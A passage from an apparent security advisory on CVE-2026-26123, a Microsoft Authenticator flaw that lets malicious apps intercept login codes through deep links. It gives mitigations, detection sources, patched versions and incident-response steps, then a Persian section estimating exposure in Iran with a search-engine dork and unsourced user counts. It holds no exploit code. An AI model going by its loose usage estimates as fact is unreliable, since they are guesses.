- Verify the handler when scanning QR codes or tapping sign-in links – ensure it is Microsoft Authenticator or another trusted app
- Use alternative MFA options (built-in authentication in password managers, platform-specific solutions)
- Use anti-malware protection for mobile devices to detect malicious apps
Long-term Defensive Measures
- Implement MDM policies to enforce automatic updates for Authenticator across the organization
- Educate users about the importance of verifying app handlers for authentication deep links
- Review enterprise device policies – Microsoft plans to restrict Authenticator use on jailbroken or rooted devices (Android rollout began February 2026; iOS rollout begins April 2026)
- Consider additional authentication layers where feasible (hardware tokens, biometric verification)
Detection & Monitoring
Recommended Detection Sources:
| Source | Purpose |
|---|---|
| Mobile Device Management (MDM) | Track Authenticator versions across enterprise devices |
| Mobile anti-malware | Detect malicious apps that may attempt to intercept authentication links |
| Vulnerability scanners | Some scanners (e.g., OpenVAS) include plugin CVE-2026-26123 |
| SIEM | Monitor for anomalous authentication patterns |
Indicators of Attempted Exploitation:
- Unusual authentication requests following accidental app handler selections
- Authentication deep links handled by unexpected applications
- Unexplained account access after user scanned a QR code or clicked a sign-in link
- Unusual device behavior from recently installed apps
Detection Strategy:
- Inventory all Microsoft Authenticator versions across the organization
- Check versions against patched releases:
- iOS:
6.8.40or later - Android:
6.2511.7533or later
- iOS:
- Monitor for outdated Authenticator versions using MDM
- Review authentication logs for anomalies that may indicate intercepted codes
Vulnerability scanning note: Some security tools can detect this CVE with the appropriate plugin (e.g., OpenVAS) .
Post-Incident Response
If exploitation is suspected:
- Isolate affected device from network access to prevent further unauthorized access
- Preserve forensic evidence (device logs, authentication logs, app installation history)
- Update Microsoft Authenticator to the patched version immediately
- Rotate credentials for any accounts that may have been compromised
- Review authentication logs to identify unauthorized access events
- Audit installed applications for potentially malicious apps that may have intercepted authentication links
- Assume account compromise – verify all recent access and reset as needed
- Document and report findings to internal security teams
For Enterprise Environments:
- Update Microsoft Authenticator for all users
- Review user education about authentication handler risks
- Audit BYOD policies and device security posture
References
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26123
- https://nvd.nist.gov/vuln/detail/CVE-2026-26123
- https://www.techrepublic.com/
- https://www.malwarebytes.com/blog/news/2026/03/microsoft-authenticator-could-leak-login-codes-update-your-app-now
- https://cve.circl.lu/vuln/CVE-2026-26123
- https://www.cybersecurity-help.cz/vdb/vulns/123716/
- https://feedly.com/cve/CVE-2026-26123
- https://mondoo.com/vulnerability-intelligence/vulnerability/CVE-2026-26123
- https://cwe.mitre.org/data/definitions/939.html
بررسی آماری آسیب پذیری CVE-2026-26123 در کشور ایران
محصول آسیب پذیر: Microsoft Authenticator
میزان استفاده در ایران بر اساس سایت های آمار مرتبط با محصول
با افزایش آگاهی امنیتی در سالهای اخیر، استفاده از اپلیکیشنهای احراز هویت مانند Microsoft Authenticator، Google Authenticator و Authy در میان کاربران ایرانی (به ویژه متخصصان فناوری اطلاعات، کارمندان سازمانها و کاربران سرویسهای ابری) رواج قابل توجهی یافته است. این اپلیکیشنها به دلیل سهولت استفاده و امنیت بالاتر نسبت به پیامک، به گزینهای محبوب تبدیل شدهاند. اپلیکیشن Microsoft Authenticator به عنوان یکی از ابزارهای اصلی احراز هویت دو مرحلهای (MFA) در جهان، کاربران قابل توجهی در ایران دارد. اگرچه آمار دقیقی از تعداد نصب این اپلیکیشن در کشور منتشر نشده است، اما شواهد متعددی حاکی از استفاده گسترده از آن است.
میزان استفاده در ایران بر اساس موتورهای جستجو (بر اساس ایندکس های گوگل در بخش tools)
تعداد در زمان نگارش گزارش
|
موتور جستجو |
Dork |
تعداد |
|
|
site:.ir “Microsoft Authenticator” |
1,580 |
وجود نمایندگی در ایران
شرکت مایکروسافت (Microsoft) دفتر رسمی یا نمایندگی مستقیم در ایران ندارد. کاربران ایرانی برای دریافت بهروزرسانیهای اپلیکیشنهای موبایل، از فروشگاههای اپلیکیشن رسمی مانند Google Play Store (برای اندروید) و Apple App Store (برای iOS) استفاده میکنند که وصلههای امنیتی نیز از همین مسیرها قابل دریافت است. هیچ گونه پشتیبانی رسمی از طرف شرکت سازنده در کشور وجود ندارد.
میزان استفاده بر اساس گزارشات تحقیقات بازار برای این محصول در ایران
اگرچه آمار رسمی و دقیقی از تعداد سیستمهای آسیبپذیر در ایران وجود ندارد، اما شواهد زیر نشاندهنده سطح قابل توجه ریسک است.
- استفاده از اپلیکیشنهای احراز هویت در ایران: تعداد قابل توجهی از کاربران ایرانی که از سرویسهای مایکروسافت (مانند Outlook، OneDrive، Microsoft 365) یا سرویسهای شخص ثالث که از Microsoft Authenticator پشتیبانی میکنند، استفاده مینمایند. بر اساس آمار جهانی، این اپلیکیشن بیش از ۷۵ میلیون کاربر فعال دارد که سهم ایران از این تعداد با توجه به جمعیت فعال در فضای مجازی و استفاده از سرویسهای بینالمللی، قابل توجه است.
- محبوبیت در بین کاربران فارسیزبان: کارمندان شرکتهای فناوری، توسعهدهندگان نرمافزار، و مدیران سیستم که از حسابهای سازمانی مایکروسافت استفاده میکنند، بخش بزرگی از کاربران این اپلیکیشن را در ایران تشکیل میدهند. این کاربران معمولاً از بهروزرسانیهای امنیتی آگاهتر هستند، اما همچنان در معرض خطر قرار دارند.
- تخمین میزان استفاده: با توجه به جمعیت فعال اینترنت در ایران (حدود ۶۵-۷۰ میلیون نفر) و نسبت کاربرانی که از اپلیکیشنهای MFA استفاده میکنند، میتوان تخمین زد که حداقل چند صد هزار تا یک میلیون کاربر ایرانی از Microsoft Authenticator استفاده میکنند. درصد قابل توجهی از این کاربران ممکن است همچنان از نسخههای آسیبپذیر استفاده کنند.
